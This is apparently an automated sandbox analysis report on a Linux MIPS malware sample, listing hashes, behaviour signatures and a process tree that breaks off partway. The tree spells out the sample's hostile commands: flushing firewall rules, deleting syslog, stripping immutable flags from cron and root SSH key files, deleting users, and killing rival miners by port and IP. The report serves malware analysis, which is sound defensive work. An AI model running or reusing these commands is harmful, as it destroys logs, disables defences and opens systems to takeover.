ae4d52616a89bd1f4438d696b4917d57b22df0197c815e769e2859faffe22492

Analysis

max time kernel
151s
max time network
27s
platform
debian-9_mips
resource
debian9-mipsbe-20240611-en
resource tags

arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
15-08-2024 22:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

9bdbe7cc8c0c8ef3d375b1f671796336_JaffaCakes118
Size

30KB
MD5

9bdbe7cc8c0c8ef3d375b1f671796336
SHA1

b0cd1a13849276d0c173ef9390dd22673a1908ee
SHA256

ae4d52616a89bd1f4438d696b4917d57b22df0197c815e769e2859faffe22492
SHA512

2fe708ebc92daf8c9c4ef9d84fa71619c42728c40b097ee2f4e049022c25253298505f7dc6f7bf724ea4e3ec4f46e03e826ec9e30bc5e57a946c233252d50317
SSDEEP

768:n+78zQ5VFNcDAFLcIwgnoYq0xFBVZAw2v:nMVF+D6cIwgoszS

Score

7^/10

Malware Config

Signatures

Flushes firewall rules 1 IoCs
Flushes/ disables firewall rules inside the Linux kernel.

Processes:

iptables

pid process

731 iptables

pid	process
731	iptables

Attempts to change immutable files 64 IoCs

Modifies inode attributes on the filesystem to allow changing of immutable files.

Processes:

xargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargschattrxargsxargsxargschattrxargsxargsxargsxargsxargsxargs

pid	process
1150	xargs
1189	xargs
1396	xargs
1222	xargs
788	xargs
832	xargs
894	xargs
1039	xargs
1060	xargs
1070	xargs
1176	xargs
1308	xargs
1378	xargs
866	xargs
1065	xargs
1444	xargs
1005	xargs
1085	xargs
1095	xargs
1253	xargs
1274	xargs
1328	xargs
1406	xargs
777	xargs
853	xargs
1358	xargs
819	xargs
859	xargs
1302	xargs
997	xargs
1105	xargs
1182	xargs
1293	xargs
1459	xargs
1045	xargs
1100	xargs
1125	xargs
1449	xargs
795	xargs
1155	xargs
970	xargs
1120	xargs
1390	xargs
945	xargs
1226	xargs
1323	xargs
1418	xargs
782	xargs
839	xargs
891	xargs
1145	xargs
1165	xargs
1196	xargs
726	chattr
812	xargs
1373	xargs
1429	xargs
724	chattr
886	xargs
982	xargs
1080	xargs
1160	xargs
1233	xargs
1434	xargs

Enumerates running processes
Discovers information about currently running processes on the system

Reads CPU attributes 1 TTPs 64 IoCs

System Information Discovery

T1082

Processes:

pspspspspspsexim4pspspkillpspspspspspspspspspspspspspspspspspspspspkillpspspspspspspkillpspspspspspspspspspspspspspspspspspspspspspspspspsps

description	ioc	process
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	exim4
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

Processes:

pspspspspspspspspkillpspspspspspspspspspspspspspspspsxargspspspspspspspspspspspspspspspspspsps

description	ioc	process
File opened for reading	/proc/1127/cmdline	ps
File opened for reading	/proc/1236/status	ps
File opened for reading	/proc/72/status	ps
File opened for reading	/proc/1435/cmdline	ps
File opened for reading	/proc/76/status	ps
File opened for reading	/proc/81/status	ps
File opened for reading	/proc/112/cmdline	ps
File opened for reading	/proc/139/status	ps
File opened for reading	/proc/meminfo	ps
File opened for reading	/proc/381/cmdline	pkill
File opened for reading	/proc/17/status	ps
File opened for reading	/proc/3/status	ps
File opened for reading	/proc/14/status	ps
File opened for reading	/proc/20/stat	ps
File opened for reading	/proc/7/status	ps
File opened for reading	/proc/21/status	ps
File opened for reading	/proc/712/status	ps
File opened for reading	/proc/77/status	ps
File opened for reading	/proc/36/stat	ps
File opened for reading	/proc/713/cmdline	ps
File opened for reading	/proc/8/status	ps
File opened for reading	/proc/934/status	ps
File opened for reading	/proc/113/status	ps
File opened for reading	/proc/75/status	ps
File opened for reading	/proc/1120/status	ps
File opened for reading	/proc/71/cmdline	ps
File opened for reading	/proc/7/cmdline	ps
File opened for reading	/proc/14/status	ps
File opened for reading	/proc/985/status	ps
File opened for reading	/proc/322/stat	ps
File opened for reading	/proc/713/cmdline	ps
File opened for reading	/proc/473/status	ps
File opened for reading	/proc/36/status	ps
File opened for reading	/proc/104/cmdline	ps
File opened for reading	/proc/self/fd	xargs
File opened for reading	/proc/711/cmdline	ps
File opened for reading	/proc/1088/stat	ps
File opened for reading	/proc/21/stat	ps
File opened for reading	/proc/327/cmdline	ps
File opened for reading	/proc/716/stat	ps
File opened for reading	/proc/21/cmdline	ps
File opened for reading	/proc/713/stat	ps
File opened for reading	/proc/7/status	ps
File opened for reading	/proc/36/stat	ps
File opened for reading	/proc/12/cmdline	ps
File opened for reading	/proc/1297/status	ps
File opened for reading	/proc/112/cmdline	ps
File opened for reading	/proc/1294/cmdline	ps
File opened for reading	/proc/76/cmdline	ps
File opened for reading	/proc/13/cmdline	ps
File opened for reading	/proc/104/status	ps
File opened for reading	/proc/381/stat	ps
File opened for reading	/proc/1/status	ps
File opened for reading	/proc/104/stat	ps
File opened for reading	/proc/716/status	ps
File opened for reading	/proc/508/status	ps
File opened for reading	/proc/1064/stat	ps
File opened for reading	/proc/711/status	ps
File opened for reading	/proc/7/cmdline	ps
File opened for reading	/proc/74/status	ps
File opened for reading	/proc/17/stat	ps
File opened for reading	/proc/1392/status	ps
File opened for reading	/proc/1/cmdline	ps
File opened for reading	/proc/14/status	ps

Writes file to tmp directory 2 IoCs

Malware often drops required files in the /tmp directory.

Processes:

touch9bdbe7cc8c0c8ef3d375b1f671796336_JaffaCakes118

description	ioc	process
File opened for modification	/tmp/zzza	touch
File opened for modification	/tmp/log_rot	9bdbe7cc8c0c8ef3d375b1f671796336_JaffaCakes118

/tmp/9bdbe7cc8c0c8ef3d375b1f671796336_JaffaCakes118
/tmp/9bdbe7cc8c0c8ef3d375b1f671796336_JaffaCakes118
1⤵
- Writes file to tmp directory
PID:713
- /usr/bin/touch
  touch /tmp/zzza
  2⤵
  - Writes file to tmp directory
  PID:715
- /bin/rm
  rm -rf /var/log/syslog
  2⤵
  PID:717
- /usr/bin/chattr
  chattr -iua /tmp/
  2⤵
  PID:722
- /usr/bin/chattr
  chattr -iua /var/tmp/
  2⤵
  - Attempts to change immutable files
  PID:724
- /usr/bin/chattr
  chattr -R -i /var/spool/cron
  2⤵
  - Attempts to change immutable files
  PID:726
- /usr/bin/chattr
  chattr -i /etc/crontab
  2⤵
  PID:728
- /sbin/iptables
  iptables -F
  2⤵
  - Flushes firewall rules
  PID:731
- /usr/bin/sudo
  sudo sysctl "kernel.nmi_watchdog=0"
  2⤵
  PID:736
- - /usr/sbin/sendmail
    sendmail -t
    3⤵
    PID:753
  - - /usr/sbin/exim4
      /usr/sbin/exim4 -Mc 1seh1g-0000C9-5u
      4⤵
      Reads CPU attributes
      PID:761
- - /usr/sbin/sendmail
    sendmail -t
    3⤵
    PID:756
  - - /usr/sbin/exim4
      /usr/sbin/exim4 -Mc 1seh1g-0000CC-7a
      4⤵
      PID:762
- - /sbin/sysctl
    sysctl "kernel.nmi_watchdog=0"
    3⤵
    PID:757
- /usr/sbin/userdel
  userdel akay
  2⤵
  PID:758
- /usr/sbin/userdel
  userdel vfinder
  2⤵
  PID:759
- /usr/bin/chattr
  chattr -iae /root/.ssh/
  2⤵
  PID:760
- /usr/bin/chattr
  chattr -iae /root/.ssh/authorized_keys
  2⤵
  PID:763
- /bin/rm
  rm -rf "/tmp/addres*"
  2⤵
  PID:764
- /bin/rm
  rm -rf "/tmp/walle*"
  2⤵
  PID:765
- /bin/rm
  rm -rf /tmp/keys
  2⤵
  PID:766
- /bin/grep
  grep -i "[a]liyun"
  2⤵
  PID:768
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:767
- /bin/grep
  grep -i "[y]unjing"
  2⤵
  PID:770
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:769
- /bin/grep
  grep 185.71.65.238
  2⤵
  PID:774
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:776
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:775
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:777
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:780
- /bin/grep
  grep 140.82.52.87
  2⤵
  PID:779
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:781
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:782
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:785
- /bin/grep
  grep :143
  2⤵
  PID:784
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:786
- /bin/grep
  grep -v -
  2⤵
  PID:787
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:788
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:792
- /bin/grep
  grep :2222
  2⤵
  PID:791
- /bin/grep
  grep -v -
  2⤵
  PID:794
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:793
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:795
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:802
- /bin/grep
  grep :3333
  2⤵
  PID:801
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:803
- /bin/grep
  grep -v -
  2⤵
  PID:804
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:805
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:810
- /bin/grep
  grep :3389
  2⤵
  PID:808
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:809
- /bin/grep
  grep -v -
  2⤵
  PID:811
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:812
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:816
- /bin/grep
  grep :4444
  2⤵
  PID:815
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:817
- /bin/grep
  grep -v -
  2⤵
  PID:818
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:819
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:823
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:822
- /bin/grep
  grep :5555
  2⤵
  PID:821
- /bin/grep
  grep -v -
  2⤵
  PID:824
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:825
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:830
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:829
- /bin/grep
  grep :6666
  2⤵
  PID:828
- /bin/grep
  grep -v -
  2⤵
  PID:831
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:832
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:836
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:837
- /bin/grep
  grep :6665
  2⤵
  PID:835
- /bin/grep
  grep -v -
  2⤵
  PID:838
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:839
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:842
- /bin/grep
  grep :6667
  2⤵
  PID:841
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:843
- /bin/grep
  grep -v -
  2⤵
  PID:844
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:845
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:851
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:850
- /bin/grep
  grep :7777
  2⤵
  PID:849
- /bin/grep
  grep -v -
  2⤵
  PID:852
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:853
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:856
- /bin/grep
  grep :8444
  2⤵
  PID:855
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:857
- /bin/grep
  grep -v -
  2⤵
  PID:858
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:859
- /bin/grep
  grep :3347
  2⤵
  PID:862
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:863
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:864
- /bin/grep
  grep -v -
  2⤵
  PID:865
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:866
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:870
- /bin/grep
  grep :14444
  2⤵
  PID:869
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:871
- /bin/grep
  grep -v -
  2⤵
  PID:872
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:873
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:876
- /bin/grep
  grep :14433
  2⤵
  PID:875
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:877
- /bin/grep
  grep -v -
  2⤵
  PID:878
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:879
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:883
- /bin/grep
  grep :13531
  2⤵
  PID:882
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:884
- /bin/grep
  grep -v -
  2⤵
  PID:885
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:886
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:889
- /bin/cat
  cat /tmp/.X11-unix/01
  2⤵
  PID:888
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:891
- /bin/cat
  cat /tmp/.X11-unix/11
  2⤵
  PID:890
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:894
- /bin/cat
  cat /tmp/.X11-unix/22
  2⤵
  PID:893
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:897
- /bin/cat
  cat /tmp/.pg_stat.0
  2⤵
  PID:896
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:899
- /bin/cat
  cat /tmp/.pg_stat.1
  2⤵
  PID:898
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:902
- /bin/cat
  cat /data/./oka.pid
  2⤵
  PID:901
- /usr/bin/pkill
  pkill -f zsvc
  2⤵
  - Reads CPU attributes
  PID:904
- /usr/bin/pkill
  pkill -f pdefenderd
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:905
- /usr/bin/pkill
  pkill -f updatecheckerd
  2⤵
  - Reads CPU attributes
  PID:907
- /bin/grep
  grep -v grep
  2⤵
  PID:911
- /bin/grep
  grep ./oka
  2⤵
  PID:910
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:913
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:909
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:912
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:919
- /bin/grep
  grep -v grep
  2⤵
  PID:918
- /bin/grep
  grep "postgres: autovacum"
  2⤵
  PID:917
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:916
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:920
- /bin/grep
  grep -v bin
  2⤵
  PID:923
- /usr/bin/awk
  awk "length(\$1) == 8"
  2⤵
  PID:922
- /bin/ps
  ps ax -o "command,pid" -www
  2⤵
  - Reads CPU attributes
  PID:921
- /bin/grep
  grep -v "("
  2⤵
  PID:925
- /bin/grep
  grep -v php-fpm
  2⤵
  PID:926
- /bin/grep
  grep -v "\\["
  2⤵
  PID:924
- /bin/grep
  grep -v proxymap
  2⤵
  PID:927
- /bin/grep
  grep -v postgres
  2⤵
  PID:928
- /bin/grep
  grep -v postgrey
  2⤵
  PID:929
- /bin/grep
  grep -v kinsing
  2⤵
  PID:930
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:931
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:932
- /bin/grep
  grep -v bin
  2⤵
  PID:937
- /usr/bin/awk
  awk "length(\$1) == 16"
  2⤵
  PID:936
- /bin/grep
  grep -v "("
  2⤵
  PID:939
- /bin/ps
  ps ax -o "command,pid" -www
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:935
- /bin/grep
  grep -v "\\["
  2⤵
  PID:938
- /bin/grep
  grep -v php-fpm
  2⤵
  PID:940
- /bin/grep
  grep -v proxymap
  2⤵
  PID:941
- /bin/grep
  grep -v postgres
  2⤵
  PID:942
- /bin/grep
  grep -v postgrey
  2⤵
  PID:943
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:944
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:945
- /bin/grep
  grep -v "\\["
  2⤵
  PID:950
- /bin/grep
  grep -v bin
  2⤵
  PID:949
- /usr/bin/awk
  awk "length(\$5) == 8"
  2⤵
  PID:948
- /bin/grep
  grep -v "("
  2⤵
  PID:951
- /bin/ps
  ps ax
  2⤵
  - Reads CPU attributes
  PID:947
- /bin/grep
  grep -v php-fpm
  2⤵
  PID:952
- /bin/grep
  grep -v proxymap
  2⤵
  PID:953
- /bin/grep
  grep -v postgres
  2⤵
  PID:954
- /bin/grep
  grep -v postgrey
  2⤵
  PID:955
- /usr/bin/awk
  awk "{print \$1}"
  2⤵
  PID:956
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:957
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:962
- /bin/grep
  grep /tmp/sscks
  2⤵
  PID:961
- /bin/grep
  grep -v grep
  2⤵
  PID:960
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:963
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:959
- /bin/grep
  grep -v grep
  2⤵
  PID:968
- /bin/grep
  grep "sleep 60"
  2⤵
  PID:967
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:970
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:969
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:966
- /bin/grep
  grep -v grep
  2⤵
  PID:974
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:975
- /bin/grep
  grep ./crun
  2⤵
  PID:973
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:976
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:972
- /bin/grep
  grep -v grep
  2⤵
  PID:980
- /bin/grep
  grep -vw kdevtmpfsi
  2⤵
  PID:979
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:978
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:982
- /usr/bin/awk
  awk "{if(\$3>80.0) print \$2}"
  2⤵
  PID:981
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:990
- /bin/grep
  grep :3333
  2⤵
  PID:989
- /bin/grep
  grep -v grep
  2⤵
  PID:988
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:991
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:987
- /bin/grep
  grep :5555
  2⤵
  PID:995
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:996
- /bin/grep
  grep -v grep
  2⤵
  PID:994
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:997
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:993
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1004
- /bin/grep
  grep "kworker -c\\"
  2⤵
  PID:1003
- /bin/grep
  grep -v grep
  2⤵
  PID:1002
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1005
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1001
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1011
- /bin/grep
  grep log_
  2⤵
  PID:1010
- /bin/grep
  grep -v grep
  2⤵
  PID:1009
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1008
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1012
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1018
- /bin/grep
  grep systemten
  2⤵
  PID:1017
- /bin/grep
  grep -v grep
  2⤵
  PID:1016
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1015
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1019
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1023
- /bin/grep
  grep netns
  2⤵
  PID:1025
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1026
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1027
- - /usr/local/sbin/kill
    kill -9 10
    3⤵
    PID:1029
- - /usr/local/bin/kill
    kill -9 10
    3⤵
    PID:1029
- - /usr/sbin/kill
    kill -9 10
    3⤵
    PID:1029
- - /usr/bin/kill
    kill -9 10
    3⤵
    PID:1029
- - /sbin/kill
    kill -9 10
    3⤵
    PID:1029
- - /bin/kill
    kill -9 10
    3⤵
    PID:1029
- /bin/grep
  grep -v grep
  2⤵
  PID:1024
- /bin/grep
  grep voltuned
  2⤵
  PID:1032
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1034
- /bin/ps
  ps aux
  2⤵
  PID:1030
- /bin/grep
  grep -v grep
  2⤵
  PID:1031
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1033
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1038
- /bin/grep
  grep darwin
  2⤵
  PID:1037
- /bin/grep
  grep -v grep
  2⤵
  PID:1036
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1035
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1039
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1041
- /bin/grep
  grep -v grep
  2⤵
  PID:1042
- /bin/grep
  grep /tmp/dl
  2⤵
  PID:1043
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1044
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1045
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1049
- /bin/grep
  grep /tmp/ddg
  2⤵
  PID:1048
- /bin/grep
  grep -v grep
  2⤵
  PID:1047
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1050
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1046
- /bin/grep
  grep /tmp/pprt
  2⤵
  PID:1053
- /bin/grep
  grep -v grep
  2⤵
  PID:1052
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1054
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1051
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1055
- /bin/grep
  grep /tmp/ppol
  2⤵
  PID:1058
- /bin/grep
  grep -v grep
  2⤵
  PID:1057
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1059
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1060
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1056
- /bin/grep
  grep "/tmp/65ccE*"
  2⤵
  PID:1063
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1064
- /bin/grep
  grep -v grep
  2⤵
  PID:1062
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1061
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1065
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1069
- /bin/grep
  grep "/tmp/jmx*"
  2⤵
  PID:1068
- /bin/grep
  grep -v grep
  2⤵
  PID:1067
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1070
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1066
- /bin/grep
  grep -v grep
  2⤵
  PID:1072
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1071
- /bin/grep
  grep "/tmp/2Ne80*"
  2⤵
  PID:1073
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1074
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1075
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1079
- /bin/grep
  grep IOFoqIgyC0zmf2UR
  2⤵
  PID:1078
- /bin/grep
  grep -v grep
  2⤵
  PID:1077
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1080
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1076
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1084
- /bin/grep
  grep 45.76.122.92
  2⤵
  PID:1083
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1085
- /bin/grep
  grep -v grep
  2⤵
  PID:1082
- /bin/ps
  ps aux
  2⤵
  PID:1081
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1089
- /bin/grep
  grep 51.38.191.178
